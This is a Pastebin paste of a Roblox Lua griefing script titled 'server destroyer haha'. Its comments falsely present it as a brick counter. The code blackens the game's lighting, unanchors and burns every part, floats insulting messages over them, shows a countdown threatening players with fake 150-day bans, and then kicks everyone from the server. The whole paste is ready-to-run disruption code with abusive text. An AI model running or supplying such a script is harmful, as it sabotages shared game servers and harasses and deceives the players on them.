Advertisement
PiterMosskva_TV

server destroyer haha

Apr 20th, 2019
520
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.25 KB | None | 0 0
  1. -- Quick scan:
  2. -- This will just give you a brick-count and print it to your output
  3. -- Go in Solo or Online mode to get a dynamic GUI counter
  4.  
  5. local lighting = game:GetService("Lighting")
  6. lighting.Brightness = 0
  7. lighting.OutdoorAmbient = Color3.new(0,0,0)
  8. local sky = Instance.new("Sky", lighting)
  9. sky.SkyboxBk = "http://www.roblox.com/asset/?id=48020371"
  10. sky.SkyboxDn = "http://www.roblox.com/asset/?id=48020144"
  11. sky.SkyboxFt = "http://www.roblox.com/asset/?id=48020234"
  12. sky.SkyboxLf = "http://www.roblox.com/asset/?id=48020211"
  13. sky.SkyboxRt = "http://www.roblox.com/asset/?id=48020254"
  14. sky.SkyboxUp = "http://www.roblox.com/asset/?id=48020383"
  15. local music = Instance.new("Sound", game.Workspace)
  16. music.SoundId = "rbxassetid://150402649"
  17. music.Volume = 1
  18. music.Looped = true
  19. music.PlayOnRemove = true
  20. music:Play()
  21.  
  22. local parts = {}
  23. function scan(p)
  24. for _,target in pairs(p:GetChildren()) do
  25. if target:IsA("BasePart") then
  26. table.insert(parts,target) -- target is the actual parts!
  27. target.Anchored = false
  28. target.BrickColor = BrickColor.new("Really black")
  29. local sb = Instance.new("SelectionBox", target)
  30. sb.Color3 = Color3.new(255, 0, 0)
  31. sb.SurfaceColor3 = Color3.new(170, 0, 0)
  32. sb.Adornee = target
  33. local pe = Instance.new("ParticleEmitter", target)
  34. pe.Name = "10101110010011"
  35. pe.Texture = "rbxassetid://45524735"
  36. pe.Rate = 10
  37. pe.SpreadAngle = Vector2.new(-90, 90)
  38. local pe2 = Instance.new("ParticleEmitter", target)
  39. pe2.Name = "ERROR_._ER-__ORO_...."
  40. pe2.Texture = "rbxassetid://158293315"
  41. pe2.Rate = 10
  42. pe2.SpreadAngle = Vector2.new(-90, 90)
  43. local bb = Instance.new("BillboardGui", target)
  44. bb.Size = UDim2.new(50,0 , 25,0)
  45. bb.AlwaysOnTop = true
  46. local randomtext = {
  47. "FEUXED IS BACK YOU FUCKING TUSKOR",
  48. "I WILL SHUTDOWN THIS SERVER!",
  49. "YOU JUST A STUPID FOOL, SHITTY"
  50. }
  51. local label = Instance.new("TextLabel", bb)
  52. label.Size = UDim2.new(1,0 , 1,0)
  53. label.TextScaled = true
  54. label.TextWrapped = true
  55. label.BackgroundTransparency = 1
  56. local brickcolor = BrickColor.new("Really red")
  57. label.TextColor3 = brickcolor.Color
  58. label.Font = "ArialBold"
  59. label.TextSize = 100
  60. local chosentext = randomtext[math.random(1, #randomtext)]
  61. label.Text = chosentext
  62. local fire = Instance.new("Fire", target)
  63. fire.Size = 30
  64. fire.Heat = 25
  65. end
  66. scan(target)
  67. end
  68. end
  69. scan(game.Workspace)
  70. --print(#parts .. (#parts == 1 and " brick " or " bricks ") .. "counted")
  71. parts = {}
  72. wait(1)
  73.  
  74.  
  75. local m = Instance.new("Message", game.Workspace)
  76. m.Text = "FEUXED IS BACK TO DESTROY SCRIPT BUILDERS!"
  77. wait(3)
  78. m.Text = "STARTING COUNTDOWN..."
  79. wait(2)
  80. m.Text = "ONCE THE TIMER REACH 0, ALL PLAYERS WILL BE 150 DAYS BANNED!"
  81. wait(5)
  82.  
  83. local unit = 10
  84. wait(1)
  85. for i = 1, 10 do
  86. unit = unit - 1
  87. m.Text = "COUNTDOWN: " ..unit.. " SECONDS LEFT!"
  88. wait(1)
  89. end
  90.  
  91. m.Text = "FAREWELL, SHITS! MUAHAHAHAHAHAHAHA!!!"
  92.  
  93. local prey = nil
  94. local parts = script.Parent:GetChildren()
  95.  
  96. for i = 1,#parts do
  97. if (parts[i].className == "Part") then
  98. if (prey ~= nil)then
  99. prey:Destroy()
  100. end
  101. prey = parts[i]
  102. end
  103. end
  104.  
  105. for i, players in pairs(game.Players:GetChildren()) do
  106. players:Kick("F3UXED !S B4CK B0I, YOU GOT BANNED FOR 150 DAYS")
  107. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement